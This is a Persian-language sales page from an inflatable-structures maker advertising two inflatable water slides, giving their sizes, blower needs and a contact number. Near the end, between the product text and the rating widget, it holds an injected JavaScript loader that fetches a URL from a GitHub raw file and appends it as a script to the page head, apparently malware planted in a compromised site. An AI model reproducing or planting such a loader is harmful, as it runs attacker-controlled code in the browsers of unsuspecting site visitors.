سرسره بادی آبی های بادی سازان مجد

سرسره بادی آبی های بادی سازان مجد

  • در این مطلب می خواهیم به سرسره بادی آبی های بادی سازان مجد بپردازیم! یعنی سرسره هایی که با باد پر می شوند و در عین حال از آب برای کارایی بیشتر آن ها استفاده می شود.

    1.بزرگترین سرسره آبی – بادی کشور

    سرسره بادی آبی های بادی سازان مجد

    این سرسره بزرگترین سرسره آبی – بادی تولید شده در سطح کشور است. بادی سازان مجد (مجد سازه) مفتخر است تنها تولید کننده این محصول باشد.

    این محصول دارای ابعاد طولی 45 متر و عرض 13.5 متر می باشد. همچنین ارتفاع این سرسره 13 متر است که برای محیط های سربسته مناسب نیست! بهترین محیط پیشنهادی برای استفاده از این سرسره بادی ترجیها سواحل دریایی، پارک های آبی و … می باشد.

    وزن کلی این سرسره چیزی در حدود 1500 کیلوگرم است که با دو فن دمنده هوا (پمپ باد) مورد استفاده قرار می گیرد. برای پر کردن این سرسره به یک دمنده هوا 1.5 اسب و یک دمنده هوا 1 اسب نیاز دارید.

    این سرسره بسیار مقاوم طراحی شده و دارای استاندارد و گارانتی پس از فروش است.

    برای خرید این سرسره می توانید با شماره تلفن 09127484573 تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید.

    2. سرسره استخر دار

    سرسره بادی آبی - سرسره بادی استخر دار

    این سرسره بادی آبی دارای طول 8 و عرض 5.3 می باشد. همچنین ارتفاع این سرسره به 4 متر می رسد که شما می توانید حتی در محیط های کوچکتر و سر بسته از آن استفاده نمایید. همچنین این سرسره دارای یک استخر در انتهای آن است که نیازمند این است که پر از آب شود. برای این کار جهت راهنمایی می توانید با مشاوران ما تماس حاصل نمایید.

    برای خرید این سرسره نیز می توانید با شماره تلفن 09127484573 تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید